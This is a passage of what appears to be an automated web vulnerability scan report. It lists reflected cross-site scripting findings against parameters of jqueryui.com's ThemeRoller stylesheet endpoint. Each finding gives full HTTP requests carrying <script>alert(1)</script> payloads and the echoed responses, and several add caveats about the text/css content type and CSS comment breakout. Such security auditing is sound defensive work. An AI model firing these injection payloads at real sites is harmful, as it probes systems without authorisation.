Date: Tue, 16 Nov 2010 02:12:29 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17796


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png23ac2<script>alert(1)</script>7ab3aebd3a&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&
...[SNIP]...

1.198. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgTextureDefault request parameter is copied unmodified into the application's response. The payload ef26d<script>alert(1)</script>aed52ae9598 was submitted in the bgTextureDefault parameter and was echoed verbatim; the legitimate value is a texture file name (03_highlight_soft.png in the request below), so an allow-list of the shipped texture names would have rejected it.

This proof of concept demonstrates that arbitrary markup can be injected into the response body. Note, however, that the response is served with Content-Type: text/css and no X-Content-Type-Options header, and the reflection sits inside the CSS comment at the top of the stylesheet that echoes the full ThemeRoller URL. A browser that honours the declared type will not parse the <script> tag, so script execution depends on the client sniffing the body as HTML; the High rating should be confirmed against the browsers in scope before it is accepted. A value containing */ would also close that comment, and whatever follows would be parsed as CSS by any page that loads this stylesheet.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.pngef26d<script>alert(1)</script>aed52ae9598&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:33 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17800


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
rContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.pngef26d<script>alert(1)</script>aed52ae9598&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=
...[SNIP]...

1.199. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgTextureError request parameter is copied unmodified into the application's response. The payload 8246e<script>alert(1)</script>e193d9c2737 was submitted in the bgTextureError parameter and was echoed verbatim; the legitimate value is a texture file name (02_glass.png in the request below), so an allow-list of the shipped texture names would have rejected it.

This proof of concept demonstrates that arbitrary markup can be injected into the response body. Note, however, that the response is served with Content-Type: text/css and no X-Content-Type-Options header, and the reflection sits inside the CSS comment at the top of the stylesheet that echoes the full ThemeRoller URL (the closing */ is visible in the snippet below). A browser that honours the declared type will not parse the <script> tag, so script execution depends on the client sniffing the body as HTML; the High rating should be confirmed against the browsers in scope before it is accepted. A value containing */ would also close that comment, and whatever follows would be parsed as CSS by any page that loads this stylesheet.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png8246e<script>alert(1)</script>e193d9c2737&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:09 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17800


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
ghlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png8246e<script>alert(1)</script>e193d9c2737&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Helvetica, Arial, sans-ser
...[SNIP]...

1.200. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgTextureHeader request parameter is copied unmodified into the application's response. The payload a201a<script>alert(1)</script>bb7d36adf3b was submitted in the bgTextureHeader parameter and was echoed verbatim; the legitimate value is a texture file name (04_highlight_hard.png in the request below), so an allow-list of the shipped texture names would have rejected it.

This proof of concept demonstrates that arbitrary markup can be injected into the response body. Note, however, that the response is served with Content-Type: text/css and no X-Content-Type-Options header, and the reflection sits inside the CSS comment at the top of the stylesheet that echoes the full ThemeRoller URL (the snippet below shows the ".com/themeroller/?" prefix of that URL). A browser that honours the declared type will not parse the <script> tag, so script execution depends on the client sniffing the body as HTML; the High rating should be confirmed against the browsers in scope before it is accepted. A value containing */ would also close that comment, and whatever follows would be parsed as CSS by any page that loads this stylesheet.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.pnga201a<script>alert(1)</script>bb7d36adf3b&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:16 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17800


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
.com/themeroller/?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.pnga201a<script>alert(1)</script>bb7d36adf3b&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcConten
...[SNIP]...

1.201. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgTextureHighlight request parameter is copied unmodified into the application's response. The payload 42800<script>alert(1)</script>197b07124e6 was submitted in the bgTextureHighlight parameter and was echoed verbatim; the legitimate value is a texture file name (04_highlight_hard.png in the request below), so an allow-list of the shipped texture names would have rejected it.

This proof of concept demonstrates that arbitrary markup can be injected into the response body. Note, however, that the response is served with Content-Type: text/css and no X-Content-Type-Options header, and the reflection sits inside the CSS comment at the top of the stylesheet that echoes the full ThemeRoller URL. A browser that honours the declared type will not parse the <script> tag, so script execution depends on the client sniffing the body as HTML; the High rating should be confirmed against the browsers in scope before it is accepted. A value containing */ would also close that comment, and whatever follows would be parsed as CSS by any page that loads this stylesheet.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png42800<script>alert(1)</script>197b07124e6&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:00 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17800


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
lorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png42800<script>alert(1)</script>197b07124e6&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=c
...[SNIP]...

1.202. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgTextureHover request parameter is copied unmodified into the application's response. The payload 4b7b1<script>alert(1)</script>981281a4f1 was submitted in the bgTextureHover parameter and was echoed verbatim; the legitimate value is a texture file name (03_highlight_soft.png in the request below), so an allow-list of the shipped texture names would have rejected it.

This proof of concept demonstrates that arbitrary markup can be injected into the response body. Note, however, that the response is served with Content-Type: text/css and no X-Content-Type-Options header, and the reflection sits inside the CSS comment at the top of the stylesheet that echoes the full ThemeRoller URL. A browser that honours the declared type will not parse the <script> tag, so script execution depends on the client sniffing the body as HTML; the High rating should be confirmed against the browsers in scope before it is accepted. A value containing */ would also close that comment, and whatever follows would be parsed as CSS by any page that loads this stylesheet.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png4b7b1<script>alert(1)</script>981281a4f1&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:41 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17798


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
rDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png4b7b1<script>alert(1)</script>981281a4f1&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&
...[SNIP]...

1.203. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgTextureOverlay request parameter is copied unmodified into the application's response. The payload 51826<script>alert(1)</script>05369075768 was submitted in the bgTextureOverlay parameter and was echoed verbatim; the legitimate value is a texture file name (08_diagonals_thick.png in the request below), so an allow-list of the shipped texture names would have rejected it.

This proof of concept demonstrates that arbitrary markup can be injected into the response body. Note, however, that the response is served with Content-Type: text/css and no X-Content-Type-Options header, and the reflection sits inside the CSS comment at the top of the stylesheet that echoes the full ThemeRoller URL. A browser that honours the declared type will not parse the <script> tag, so script execution depends on the client sniffing the body as HTML; the High rating should be confirmed against the browsers in scope before it is accepted. A value containing */ would also close that comment, and whatever follows would be parsed as CSS by any page that loads this stylesheet.

Request

GET /themeroller/css/parseTheme.css.php?ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png51826<script>alert(1)</script>05369075768&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:22 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18083


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png51826<script>alert(1)</script>05369075768&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRa
...[SNIP]...

1.204. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgTextureShadow request parameter is copied into the HTML document as plain text between tags. The payload 8f4d4<script>alert(1)</script>0d8e7da9b92 was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png8f4d4<script>alert(1)</script>0d8e7da9b92&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:23 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18080


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
Error=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png8f4d4<script>alert(1)</script>0d8e7da9b92&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px
*/


/* Component containers
----------------------------------*/
.ui-widge
...[SNIP]...

1.205. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the borderColorActive request parameter is copied into the HTML document as plain text between tags. The payload e455c<script>alert(1)</script>f14fbfd5217 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000e455c<script>alert(1)</script>f14fbfd5217&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:52 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
ighlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000e455c<script>alert(1)</script>f14fbfd5217&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaa
...[SNIP]...

1.206. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the borderColorContent request parameter is copied into the HTML document as plain text between tags. The payload 486a3<script>alert(1)</script>334651bb09d was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

